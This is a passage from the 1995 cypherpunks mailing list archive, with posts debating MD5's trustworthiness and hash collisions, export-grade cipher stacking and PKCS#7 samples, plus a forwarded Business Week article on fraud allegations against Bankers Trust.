discouraged.  One effect of this lack is that almost every layer of 
the network stack is adding its own encryption.  For example, the 
HTTP session layer added S-HTTP and the TCP transport layer added 
SSL.  Soon we will have network layer encryption with IPsec.
        The vendors for each layer can export a product that uses
ciphers with 40 bit keys.  A user can then combine multiple 
products to get more than 40 bits worth of security.  For example, 
a web client might fetch an S-HTTP page over an SSL protected link 
via a firewall that supports IPsec tunnels.  That's three 40 bit 
keys protecting the data over the internet link (of course, this 
may not be equivalent to a 120 bit cipher, that depends on the 
details of the cipher systems and independence of the key setups). 
Interesting possibilities.
                --Bob Baldwin






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@crypto.com>
Date: Tue, 24 Oct 95 12:02:35 PDT
To: hallam@w3.org
Subject: Hash collisions [was Re: MD5 weakness ? ...]
In-Reply-To: <9510241714.AA22217@zorch.w3.org>
Message-ID: <199510241903.TAA18608@crypto.com>
MIME-Version: 1.0
Content-Type: text/plain



>
>>As to weaknesses, I seem to remember that someone managed to forge a
>>modification to a program used to observe networks on a Sun so that it
>>had the same MD5 checksum as the official trusted version.  But whether
>>this is real is not strictly the issue. 
>
>Ron has not mentioned such an event to me and if that were the case I would 
>seriously doubt that he would not have been told about it. The only comment he
  
>generally makes is that he wrote MD5 because "MD4 was making me nervous".
>
>>In the case of the trust being placed in MD5 by Netscape, the assumption
>>being made (without adequate support as far as I can tell) is that an
>>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>
>Netscape do not simply use the MD5 of the message, they are using (as I 
>understand it) the PKCS#1 standard for makoing the signature. If not they 
>probably have severe problems.
>
>>There has been no limit given by anyone on this list to the level of
>>trust they place in MD5.  Several people have posted (without
>>contention) that MD5 is sufficiently trustworthy to trust billions of
>>dollars in commerce to it's being able to prevent a selected plaintext
>>attack as eluded to above. 
>
>NIST and the NSA trusted MD4 sufficiently to base SHA upon it. SHA is preferab
 le 
>in many ways to MD5, it has a different approach to extending the scheduling a
 nd 
>resist differential cryptanalysis. There is a problem with the compressor 
>function of MD5 which I dislike. This is fairly irrelevant though since SSL 
>allows other digests to be used.
>
>	Phill

I hesitate to jump in to this exchange given the defensive and
vague nature of the discussion, but...

While I agree that SHA seems preferable, for a number of reasons,
to MD5, it is worth noting that Hans Dobbertin of the German Information
Security Agency recently found a collision in MD4. His attack
allows you to generate a pair of plainexts that generate the same hash.
A fast technique for finding a second plaintext that hashes to some given
value remains an open problem with MD4 (and SHA and MD5, for that matter).

As far as I can tell the attack does not readily generalize to MD5
or SHA.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Bryan <sbryan@maroon.tc.umn.edu> (Steve Bryan)
Date: Tue, 24 Oct 95 13:05:51 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
Message-ID: <v02130502acb2c07e0758@[204.221.10.130]>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:

>In the case of the trust being placed in MD5 by Netscape, the assumption
>being made (without adequate support as far as I can tell) is that an
>MD5 checksum cannot be forced, through a chosen plaintext attack, to
>yield checksums of 1, 2, 3, 5, 7, 9, ...  on up to enough primes to
>allow the known plaintext attack that gets the RSA private key used to
>authenticate messages.  As far as I am aware (and I may not be aware of
>everything) there is no reference work to support this assumption.  If
>the assumption is wrong, then the whole SSL can fall to a selected
>plaintext attack launchable (presumably) through those general purpose
>Java aplets we have heard so much about.

With a mailing list this large and diverse one can reasonably assume a range of interests and expertise. What I don't understand is your agnostic stance on something as apparently basic as MD5. If computer security is your purported area of expertise why have you not reached any firm conclusions about it? I understand that rigid conclusions are unsafe (eg they'll never prove Fermat's last theorem) but it is not like every question is equally open. Do you have a realistic attack on MD5 or is this sophomoric claptrap? How do you propose to generate messages with specific message digests? Assuming you could somehow, how do you proceed to use that information to your advantage? So let's say I have a message digest and I'm retrieving the allegedly corresponding message which you have the opportunity to alter to your heart's content. How would you proceed, even in principle, to defeat MD5? I realize I might be assuming too much when I posit that I have the true MD5 for the message but my understanding is that you feel that MD5 might be vulnerable. I've given you all the known plaintexts. Is there a next step?

+----------------------------------------------------------------------
|Steve Bryan                Internet: sbryan@gofast.net
|Sexton Software          CompuServe: 76545,527
|Minneapolis, MN                 Fax: (612) 929-1799
|PGP key fingerprint: B4 C6 E2 A6 5F 87 57 7D  E1 8C A6 9B A9 BE 96 CB
+----------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Tue, 24 Oct 95 12:14:21 PDT
To: sameer@c2.org (sameer)
Subject: Re: C|Net
In-Reply-To: <199510241637.JAA02576@infinity.c2.org>
Message-ID: <m0t7okY-000xhpC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

While browsing my mail I noticed that sameer wrote:
 
> 	Eesh folks. Someone resgistered cypherpunks/cypherpunks as a
> username/password combination as c|net and that was the
> verification. relax.
> 
> > 
> > ----------------crap deleted---------------

Well to stray off topic,as seems to be the case lately,
I saw Sameer's interview on C-Net a coupla weeks back. Nice to be able to 
place a name with a face. Too bad they didn't give you a chance to say more
for the cause.

Now.....back to crypto....

- -- 
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: There was a bluestocking in Florence
Wrote anti-sex pamphlets in torrents,
	Till a Spanish grandee,
	Got her off with his knee,
7 d she 

iQCVAgUBMI06E7bmxeO+s+1xAQEBDQQAoGlMjWcSzHNuU1SchnPby5qstT2HruNK
K49EFM/soIO9LAvoYDa6Q2dZBd/kyRk3bj5WEK4hN9qihifnwuk83sCF3gJK67oW
CcTO+Z2dp3yWKVgX0Ki8K1iFdEbCfV2n1CujD+8bF914oZF4ZRLAbGLRtozqIzo4
65zJjHe2M58=
=8tvy
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Young <eay@mincom.oz.au>
Date: Mon, 23 Oct 95 22:21:01 PDT
To: cypherpunks@toad.com
Subject: pkcs7 examples
Message-ID: <Pine.SOL.3.91.951024150442.12625C-100000@orb>
MIME-Version: 1.0
Content-Type: text/plain



Greetings peoples,

I have just about finished writing routines to parse and write pkcs7 objects.
I have written all the backend digital envelope routines and so now I 
have to decide on the the library API and test things.

I currently only have a single pkcs7-signedData example, one that is being 
used to 'transport' x509 certificates and CRL's.

Do any of you out there have pkcs-7 'objects' you can send me?
I especially want examples of pkcs7 signedAndEnveloped.

For those that don't know, pkcs7 is used in S/MIME and is a superset of 
PEM.  The degenerative case of signedData is being used by protocols 
such as SSLv3 to transport X509 CRL's.

thanks in advance.

eric (whos SSL library is becoming a kitchen sink of crypto related stuff)
--
Eric Young                  | Signature removed since it was generating
AARNet: eay@mincom.oz.au    | more followups than the message contents :-)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Tue, 24 Oct 95 07:29:09 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <LAA19345.199510231500@garotte.va.pubnix.com>
Message-ID: <9510241425.AA08815@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain


DOCTOR Frederick B. Cohen writes:
 > [...] uses an MD5 checksum which the members
 > of this list seem to place unlimited trust in (incorrectly in my view,
 > but that would be picking two nits with one keyboard entry).

Can you elaborate with facts on the supposed weakness of MD5 ?

[btw who talked about 'unlimited' trust ?]

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

AK-47 PGP domestic disruption CIA cracking strategic Clinton




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 24 Oct 95 07:30:35 PDT
To: cypherpunks@toad.com
Subject: Bankers Trust Frand Story
Message-ID: <199510241429.PAA09756@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



Bankers Trust is one of the companies that are pushing
strongly for CKE and want to be one of the keyholders.
They have hired Stu Baker (Fmr NSA General Council), 
Nanette DiTosto from the International Chamber of Commerce 
and Ernie Brickell from Sandia Labs.

The tapes reveal a variety of fraudlent behavior by 
BT's employees who brag about fucking their clients. 

Who wants to give their keys to them?

-------------
Business Week: October 16, 1995
Department: Cover Story
THE BANKERS TRUST TAPES
In just-released court papers, Procter & Gamble lays out racketeering charges against Bankers Trust. The key evidence: Some 6,500 tape recordings

It's Nov. 2, 1993, and two employees of Bankers Trust Co. are discussing a leveraged derivative deal the bank had recently sold to Procter & Gamble Co. ``They would never know. They would never be able to know how much money was taken out of that,'' says one employee, referring to the huge profits the bank stood to make on the transaction. ``Never, no way, no way,'' replies her colleague. ``That's the beauty of Bankers Trust.'' 
   That dialogue was automatically picked up by a Bankers Trust recording system--similar to those at other financial institutions--that routinely tapes conversations involving transactions, mainly to settle disputes over trades. It is part of a mountain of evidence--6,500 tapes, as well as 300,000 pages of written material--that forms the basis of a major legal assault by P&G against the bank. P&G contends that the 1993 conversation is just one of many showing that Bankers Trust deliberately misled and deceived P&G, keeping the company in the dark about key aspects of the derivatives the bank was selling.
   Once one of the most powerful, profitable, and aggressive banks in the world, Bankers Trust has been humbled over the past 18 months by a series of debacles in its core derivatives business, with numerous clients of the bank sustaining large losses. P&G took a $102 million aftertax charge for losses on Bankers' derivatives, perhaps the largest of any of its customers. Several other clients have also sued the bank for losses. And the Securities & Exchange Commission, the Commodity Futures Trading Commission, and the Federal Reserve Bank of New York have all investigated Bankers' derivatives sales practices and reprimanded or censured the bank.
   Procter & Gamble's fight with Bankers Trust is now taking a new and far more ominous turn for the bank. On Sept. 1, P&G filed a motion with the U.S. District Court in the Western Division of the Southern District of Ohio to add RICO (racketeer-influenced and corrupt organization) charges to its list of allegations against the New York bank and its affiliate, BT Securities Corp. Supporting documents, which contain numerous excerpts of conversations by the bank's employees, were sealed until Oct. 3. On the same day, district court judge John Feikens approved the P&G RICO motion.
   Some portions of the tapes, mainly concerning Gibson Greetings, a Bankers Trust client, became public last year. But the newly released portions, some of which are potentially incriminating, are much more extensive. They focus on eight Bankers customers besides P&G. The alleged losses of three of them--Sandoz, Sequa, and Jefferson Smurfit--had not been previously detailed. Other alleged victims in the amended complaint are Gibson Greetings, Equity Group Holdings, Adimitra Rayapratama, Air Products & Chemicals, and Federal Paper Board (table, page 111).
``BLACKMAIL.'' P&G uses evidence of alleged wrongdoing against these clients to buttress the racketeering charges, which require a showing of broad, systemic fraud. Asserts the P&G filing: ``It is now apparent that Defendants' treatment of P&G was not an isolated incident or a `garden-variety fraud,' but rather part of a pattern of mail, wire, and securities fraud spanning a number of years and involving multiple victims.'' 
   In a 400-page filing opposing P&G's claims, Bankers says that ``P&G plainly has proposed adding civil RICO claims at this late date for their in terrorem effect; laymen would call it blackmail.'' The bank says further that ``The real impetus for these charges is P&G's hope that legitimate criticism of decisions by P&G's senior management and Treasury Dept. staff will be lost at trial in a sea of accusations about customers other than P&G, and that Bankers Trust can be vilified by the sheer number of P&G's accusations.'' In a statement released after P&G's documents were unsealed, Bankers said that ``What P&G has done is to use material we provided to manufacture a distorted view of transactions, markets, individuals, and the corporation in a manner designed to serve its own objectives and to obscure P&G's own accountability.'' BW attempted to solicit comments from Bankers Trust's directors, but they either refused, referred calls to the bank, or could not be reached.
   P&G provides a detailed case for its side. To substantiate its claim that a ``culture of greed and duplicity'' was an element of the general climate in parts of Bankers' derivatives business, P&G cites a videotaped training session for new employees. At the session, a bank employee tells his charges that, in a hypothetical derivative transaction among Sony, IBM, and Bankers Trust, ``what Bankers Trust can do for Sony and IBM is get in the middle and rip them off--take a little money.'' The employee then adds: ``Let me take that back. I just realized that I'm being filmed.'' A Bankers spokesman played six minutes of the videotape of the session for BW, which the bank says lends support to the bank's contention that the employee's comment was ``a very poor attempt at humor, but nothing more,'' in an ``otherwise dull presentation'' and that the comment was taken out of context.
   According to P&G: ``Fraud was so pervasive and institutionalized that Bankers Trust employees used the acronym `ROF'--short for rip-off factor, to describe one method of fleecing clients.'' An internal document about a proposed derivative for Federal Paper Board allegedly says that Bankers would make $1.6 million on the deal, including a ``7 [basis point] rip-off factor.'' In a different instance, two Bankers employees are discussing a client's loss on a trade. One then tells the other: ``Pad the number a little bit.'' P&G quotes another Bankers Trust employee saying to a colleague: ``Funny business, you know? Lure people into that calm and then just totally f--- 'em.'' 
   In responding to conversations by Bankers Trust employees quoted in this story, a bank spokesman says that ``the stupid and crude comments between Bankers Trust employees on these tapes were the basis for our disciplinary actions against these individuals last year.'' A number of the employees quoted in the documents have left Bankers, been disciplined, or been reassigned.
UPPING THE ANTE. John E. Pepper, P&G's new CEO, will not comment on the Bankers situation. But the racketeering charge shows he is maintaining the company's well-known aggressive legal posture. A P&G spokeswoman says: ``We've reviewed hundreds of recorded telephone conversations and thousands of documents through discovery and believe the RICO claim was appropriate. We plan to proceed with the case.'' The company further claims that it expects to uncover additional evidence.
    In its filings, P&G details three primary schemes Bankers allegedly used to defraud its clients. It says the bank fraudulently induced clients to buy complex derivatives, misrepresented the contracts' value, and then induced clients to buy additional complex derivatives, either for further ``alleged gains'' or to stanch losses. It quotes one banker describing a client's portfolio as being in total disarray: ``If this ever comes out in the press, it is the most insane mess of trading I've ever, ever seen...they just kept trying to trade them out of losses...Everything they put in [the client's account] lost.'' 

_________________________________________________________________

`` P&G has...manufacture[d] a distorted view of transactions, markets, individuals, and the corporation . . . to serve its own objectives and to obscure P&G's own accountability ''
 --     BANKERS TRUST PRESS RELEASE
_________________________________________________________________

   The new charges, which claim $195.5 million in damages, could prove extremely embarrassing to the bank--or worse. Any company found guilty of civil RICO charges must pay treble damages and plaintiffs' legal costs. Such an outcome could push Bankers to settle the suit regardless of its culpability. ``It ups the ante,'' says attorney Robert Plotkin of Paul, Hastings, Janofsky & Walker in Washington. In addition, clients could become unsettled by the appearance of a corrupt culture, and senior management could come under even more pressure.
   Much of the dispute between Bankers Trust and its clients that suffered losses may depend on whether the clients were simply naive and should have known what they were getting into or whether Bankers Trust deliberately deceived them. P&G strongly argues the latter.
   On Jan. 20, 1993, P&G had no inkling that its relationship with Bankers would ever deteriorate so badly. That's when it set up a broad agreement with the bank for derivatives contracts. One goal was to lower the rate at which P&G would borrow money. Derivatives are contracts in which companies make payments to each other tied to some underlying asset. The value of the payments--and thus the contract--is derived from those assets. Besides lowering financing costs, buyers may use derivatives to manage risk or speculate on interest and currency rates.
   P&G seemed to be an active and sophisticated player in the financial markets: It had $5 billion in long-term debt outstanding, and it carefully managed its financing costs. In court filings, Bankers describes P&G as ``sophisticated, experienced, and knowledgeable about the use of interest-rate derivative contracts and the risks presented by those contracts.'' The bank adds: ``Although P&G would like this court to believe that it is a naive and unsophisticated user of derivatives transactions, the fact is that as part of its regular course of business and with authorization from top management...P&G's Treasury Department managed a large and sophisticated portfolio of derivative transactions.'' P&G, the bank says, was a party to derivatives tied to assets with a value of more than $6 billion as of June, 1993.
   In its memorandum opposing P&G's motion, Bankers presents documents, including handwritten notes apparently by Edwin Artzt, P&G's chief executive officer at the time, that suggest the Cincinnati company was knowingly stepping up the riskiness of its financing activities when it entered into the disputed transactions with Bankers. P&G says the note does not apply to debt management or to the transactions in the litigation.
   On Nov. 2, 1993, P&G agreed to an offer from Bankers Trust to buy a leveraged derivative product. Leveraged derivatives are a particularly complex type of derivative, and their value can fluctuate to an even greater degree than ordinary, plain-vanilla derivatives. The contract called for P&G to make variable-rate payments to Bankers, with the rate to be set over the next several months.
   It is not clear whether P&G knew what the cost of getting out of the contract might be, and P&G has since acknowledged that its internal procedures were not followed when it agreed to this derivative. The company also ultimately reassigned two employees involved with the derivatives, and its treasurer, Raymond D. Mains, who later elected to retire early. Mains declined to comment. But at the time, the company believed it might get interest costs below what they would have been otherwise.
   The derivative seemed to work fine at first. Indeed, P&G was sufficiently satisfied to agree to a second leveraged derivative contract on Feb. 14, 1994. But P&G began encountering serious problems almost immediately. On Feb. 4, interest rates had begun rising after more than three years of near-continuous decline. The higher rates sharply pushed up P&G's payments to Bankers under the terms of the complex derivatives.
``IRRESPONSIBLE AND REGRETTABLE.'' On Feb. 22, P&G claims, Bankers told the company that at that day's rate, P&G stood to pay Bankers an increased interest rate of 4.5 percentage points above the commercial-paper rate on its Nov. 2 derivative, bringing its extra financing costs to over $40 million. P&G says its officials were alarmed by the unexpectedly large amount. They charge that when they asked Bankers for an explanation, they learned that the bank was using a proprietary model to figure the costs. Bankers, P&G's complaint says, ``stated that P&G was bound by a pricing model which [Bankers] did not disclose to the very party that it asserted was bound by such model.''

_________________________________________________________________

`` What Bankers Trust can do for Sony and IBM is get in the middle and rip them off-take a little money....Let me take that back, I just realized I'm being filmed ''
 --     P&G COURT FILING THAT ALLEGEDLY REFLECTS WHAT WAS SAID AT A BANKERS TRUST VIDEOTAPED TRAINING SESSION

_________________________________________________________________

   Bankers Trust's court filings include a transcript of an October, 1993, conversation between Bankers and P&G in which Bankers apparently shows a P&G treasury employee how to calculate its rate on the Nov. 2 derivative. Bankers says this transcript demonstrates that P&G clearly knew how its derivative would perform. The bank also cites file memos from three P&G employees that it says indicate that P&G was made aware of the rising rates on its Nov. 2 derivative in early or mid-February, 1994. As for the Feb. 14 derivative, Bankers presents as evidence notes by P&G's chief financial officer, Erik Nelson, that it says show that he did not feel P&G was misled on that derivative's terms.
   P&G, however, claims that those notes were written before the company learned all it now knows about that derivative. And it says Bankers employees were clearly and almost continuously trying to deceive it from the day the derivative contract was initiated. P&G cites a taped conversation between Bankers employees about the Nov. 2 P&G contract where one asks: ``Do they [P&G] understand that? What they did?'' The other replies: ``No. They understand what they did but they don't understand the leverage, no.'' The first employee then responds: ``But I mean...how much do you tell them. What is your obligation to them?'' The second employee answers: ``To tell them if it goes wrong, what does it mean in a payout formula...'' 
   Bankers employees were often gleeful at the big profits they were booking, according to P&G. The second employee quoted above says P&G undertook an option trade as part of a derivatives contract, and Bankers paid P&G only half what that option was worth. The employee allegedly remarks: ``This could be a massive huge future gravy train.'' He also allegedly discussed how significant one of P&G's contracts had been for Bankers, saying, ``This is a wet dream.'' 
In April, P&G claims, Bankers Trust gave the company charts showing that it would have had to pay a penalty to get out of its Nov. 2 contract almost from Day One. According to P&G's documents, one Bankers salesman, discussing P&G's agreement to enter into the Nov. 2 contract, said ``we set 'em up.'' P&G claims that, unbeknownst to the company at the time, there were periods when Bankers' model calculated that P&G's potential penalty payment to exit the derivative was rising even when interest rates were falling.
   P&G claims that around that time, some Bankers employees were themselves worrying about the suitability of their activities. It cites a March, 1994, conversation between two employees where one said he had ``fears of SEC probes.'' ``This wave was always...made up of polluted water,'' one says. The other recalls telling a colleague that ``as soon as we quit selling dynamite, maybe we'll have a good business.''
   P&G ultimately locked in interest rates on both of the leveraged derivatives in dispute. But it alleges that by the time it finished doing so, in April, 1994, its financing costs stood to be some $195.5 million higher than they should have been. That same month, P&G said: ``We are seriously considering our legal options relative to Bankers Trust.'' 
   In a statement, Bankers concedes that some of the taped conversations ``were irresponsible and regrettable.'' But it says the remarks fall short of proving the deception P&G alleges. Instead, it produces evidence in court filings that P&G's top executives blamed their own personnel for the investment blunders. ``Rather than putting its own house in order, and accepting its losses, P&G chose instead to bring this lawsuit.''

_________________________________________________________________

`` Fraud was so pervasive...that Bankers Trust employees used the acronym ROF-short for rip-off factor, to describe one method of fleecing clients ''
 -- P&G COURT FILING

_________________________________________________________________

   P&G is also making serious fraud claims about Bankers' dealing with other clients. Several of the alleged victims have already gone public with their derivatives grievances. Gibson Greetings has settled a lawsuit with Bankers, as has Equity Group Holdings. Adimitra Rayapratama also sued, claiming RICO violations, although a ruling dismissing its suit on jurisdictional grounds is under appeal. And Federal Paper Board has settled with Bankers. Bankers Trust says in court filings that it needs much more information before it can refute P&G's allegations about other companies.
   The P&G filing provides new information about three Bankers Trust clients whose relationship with the bank has not been previously detailed. In the case of Sandoz Corp., P&G claims that Sandoz entered into a leveraged derivative contract with Bankers on Jan. 31, 1994. Beginning in February, P&G says, employees of BT Securities knowingly misled Sandoz about the value of its contract by $5 million. Sandoz allegedly amended its derivative contract nine times on Bankers' recommendation, spending some $25 million in the process. At one point, P&G asserts that Sandoz paid $4.2 million to modify its derivative contract when the change increased its value by only $2.9 million. That netted Bankers over $1.4 million.
SETTLEMENT? P&G also claims that a BT Securities representative, knowing that such a move would generate a large profit for Bankers, told Sandoz that the ``conservative'' way to manage its position would be to double its exposure while increasing the interest rate above which it would be hit with higher payments under the contract. But on Feb. 22, discovering that Bankers did not have the proper hedge to cover such a change, the Bankers rep reversed course--and began encouraging Sandoz to reduce its position. P&G alleges that Sandoz lost $78.5 million in dealings with Bankers. Sandoz General Counsel Robert L. Thompson says: ``We have settled a matter with Bankers Trust. The terms of the settlement are confidential,'' and he adds that Sandoz continues to have a ``productive'' relationship with Bankers.
   As for Sequa Corp., P&G alleges that Bankers sold it a leveraged derivative--similar to P&G's Nov. 2 contract--on Oct. 1, 1993. In December, Bankers allegedly proposed various amendments to the contract that it told Sequa were costless. But, says P&G, an internal Bankers Trust phone call described it as having a negative value for Sequa of $600,000 and a profit for Bankers Trust of $200,000.
   With interest rates rising, P&G says Sequa terminated half of the contract in February, 1994, at a cost of $2.5 million. Sequa allegedly terminated the rest a month later at a cost of $4.5 million, financing that with another transaction in which it was to pay Bankers $6 million over the ensuing two years. Total alleged loss: $7.5 million. Sequa declined comment.
   In the case of Jefferson Smurfit Corp., P&G alleges that Smurfit entered into a leveraged derivative contract in May, 1993. The derivative quickly began losing value, P&G says, and Smurfit closed out the contract and was paid $1.17 million by Bankers. But that was at a time, P&G claims, when Bankers internally valued Smurfit's position in the contract at $4.4 million.
   Smurfit agreed to another leveraged-derivative contract in December, 1993, according to P&G. The company says Bankers ``induced Smurfit to amend this swap [a kind of derivative] 11 times before it was finally unwound in September, 1994.'' Meanwhile, the value of Smurfit's contract was declining. P&G says Bankers did not tell Smurfit, however. Alleges P&G: ``As early as February, 1994, BT Securities marketers discussed the fact that Smurfit was $5 [million] or $6 million down on the deal and that Smurfit's Treasurer `has no clue' about how far `underwater' his company was on the transaction.'' 
   At one point, P&G claims, Bankers Trust employees discussed showing Jefferson Smurfit some information regarding one of its derivatives, and one employee said: ``...what we show them is gonna be kind of baloney....'' Ultimately, P&G says, Smurfit lost more than $2.4 million on its derivatives dealings with Bankers. Smurfit says it is not aware of suffering any losses on derivatives with Bankers.
   What's next for Bankers Trust? It's possible that the bank will settle with P&G rather than endure the possible playing of hours of incriminating tapes in open court. The Securities & Exchange Commission, which investigated Bankers Trust's derivatives sales practices, forced a deeply embarrassing settlement on the firm. The SEC says it is continuing to investigate evidence of individual wrongdoing. One thing, though, is clear: The ``massive huge future gravy train'' has been permanently derailed.


The Tale Of The Tapes

Procter & Gamble, through discovery, obtained 6,500 tape recordings, as well as 300,000 pages of documents from Bankers Trust. The material concerned nine Bankers Trust clients who lost money dealing with the bank. From this evidence, P&G is alleging that Bankers Trust:
  -- Engaged in a pervasive pattern of fraud spanning a number of years and involving numerous victims
  -- Induced customers to purchase complex derivative deals that produced high profits for the bank and often big losses for many of its clients
  -- Misrepresented to clients the pricing, current value and risks of the products it sold
  -- Refused to share its secret pricing models and other proprietary devices 
  -- Caused customers who had suffered losses to engage in ever more complex transactions that were supposed to recoup losses but that often brought on even more problems
DATA: BUSINESS WEEK, COURT FILINGS


By Kelley Holland and Linda Himelstein in New York, with Zachary Schiller in Cleveland

Copyright 1995 The McGraw-Hill Companies All rights reserved. Any use is subject to (1) terms and conditions of this service and (2) rules stated under ``Read This First'' in the ``About Business Week'' area.




Transmitted: 95-10-04 19:59:07 EDT (B34461)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Tue, 24 Oct 95 12:52:50 PDT
To: cypherpunks@toad.com
Subject: (fwd) Chaum vs. Stein
Message-ID: <v02120d02acb2f46481bb@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text

To: www-buyinfo <www-buyinfo.allegra..att..com@mail.checkfree.com>
From: Andrew Barrett/CheckFree Corporation
  <Andrew_Barrett@checkfree.com>
Date: 24 Oct 95 13:38:40 EDT
Subject: Chaum vs. Stein
Mime-Version: 1.0

Wanted to save my 'me too' until a time I could piggy-back it onto something a
little more pithy (and I DO mean 'little'). Robert, thanks for taking the time
and energy for filtering cpx and forwarding the best. David, thanks for
providing the forum. Now that  _that's_  out of the way ...

I've just been handed a registration booklet for The Bank Administration
Institute's Retail Delivery '95 conference December 2-6 in Atlanta. Notable
speakers include The Bill, MasterCard CEO Eugene Lockhart, Visa International
CEO Edmund Jensen, Intuit CEO Scott Cook and Checkfree CEO Pete Kight (among
others).

Featured on page 6 is a "Fireside Chat: The Financial Marketplace of the
Future" moderated by Lou Dobbs... How warm and fuzzy. What really caught my eye
was a panel discussion on Internet Security scheduled for that Wednesday. The
panelists are David Chaum, Cybercash CEO William Melton, and FV CEO Lee Stein.

If anyone goes, tell us all how it went!

Kicker -  the postal frank is of the "non-profit organization" variety.
BIA's site is at http://www.bai.org

--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Mittelhauser <jonm@netscape.com>
Date: Tue, 24 Oct 95 16:01:55 PDT
To: cypherpunks@toad.com
Subject: Re: Does your software?
In-Reply-To: <199510241710.NAA18747@jafar.sware.com>
Message-ID: <308D0DA4.7ED@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:

> Yet it services more than one request per minute, 24 hours, 7 days, and
> has done so without denial of services, corruption, or leakage since its
> first implementation.  It's so small it can be verified, it's faster
> than the retail brand, and it doesn't have all the holes we keep finding
> in tho other servers.  Different strokes for different folks.

I really tried to resist but....

1 request a minute!!!!  That's a whopping 1440 a day!  Try 20+ a second or
over a million a day which is the current rough load which most of our
servers on our site handle...(our peak day last week was 17 million hits).

I don't disagree that there is value in producing a trivial server which
can be guaranteed to have zero bugs (since it is so small).  It, however,
should be treated as an intellectual excercise.  Comparing it to a production-level
retail server is simply meaningless..they have different goals (as your last
post emphasized)...

-Jon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 24 Oct 95 13:04:15 PDT
To: cypherpunks@toad.com
Subject: Re: MD5 weakness ? [was Re: Netscape Logic Bomb detailed by IETF]
In-Reply-To: <199510241554.LAA27916@opine.cs.umass.edu>
Message-ID: <9510242001.AA16913@all.net>
MIME-Version: 1.0
Content-Type: text


...
> I believe Dr. Cohen's point is that no-one knows, AFAIK, how to prove that a
> one-way hash is truly one-way (uninvertible). We cannot prove that MD5 is
> secure, ergo we cannot (completely) trust it. [Please correct if this is a
> substantially incorrect inference.]
> 
> One of the standard responses is "it's the best we can do". When people said
> this about PGP, FBC made some (IMHO) interesting comments about the
> encryption he uses in various circumstances. Perhaps he would like to share
> his personal choices of one-way hash functions with us.

Since you asked:

It's a really complex issue.

	As a fundamental, we know that any "one-way" hash function must
be many-to-one, which means that, in practice, there are always large
numbers (2^large numbers) of sources for any given hash.  This means
that forgeries are always possible. 

	I know of no way to prove that (and no convincing argument that
the workload for creating) a forgery is hard for any "one-way" hash
function.  This seems to mean that we are always betting on faith about
these things. 

	The techniques that seem to be reasonably good are; modular
exponentiation in a modulus that's the product of two appropriate primes
(a.k.a.  RSA but throw out the private key when you create it); certain
classes of non-linear feedback shift registers of high degree; and some
general class of mixing algorithms like MD5. 

	The RSA-type hash is slow, and some great mathematician may show
up tomorrow and lay waste to the whole thing.  Non-linear feedback shift
registers have the advantage that we don't know how to factor
high-degree equations, so we don't know how to make simple closed form
solutions to find output values.  MD5-type systems are good because they
combine diffusion and confusion and avoid a lot of the more well-known
flaws as far as we know. 

	None of these reasons are particularly convincing, so I think we
have to take a risk management approach.  So the ultimate question here
is, how much are we willing to bet that nobody can break one of these in
the intended application over a particular time frame. 

	I trust the RSA and NLFSR systems, if reasonably well
implemented, for a single short time-frame low-valued transaction.  For
example, pick a good pseudo-random number and create an RSA one-way hash
of 512 bits (the random number issue is of course another whole area),
encrypt the first bloack, Xor with the second block, encrypt the result,
etc.  till done, then Xor again with the original random seed, send the
file and the hash along with the one-way key, and get a confirmation
back within a few days. 

	I don't trust any of them as a basis for running a major part of
an economy over open communications links, and I especially don't trust
them when combined or when the security of one depends on another.  To
run an economy, I think you need more redundancy, more personnel
security, more stop-loss capabilities, physically secure devices,
independent checks and balances, etc.

	Someone on this list mentioned that the banking system trusts
the RSA and MD5, etc.  but this seems to me to be a mischaracterization. 
They trust these systems to an extent, but they have key change
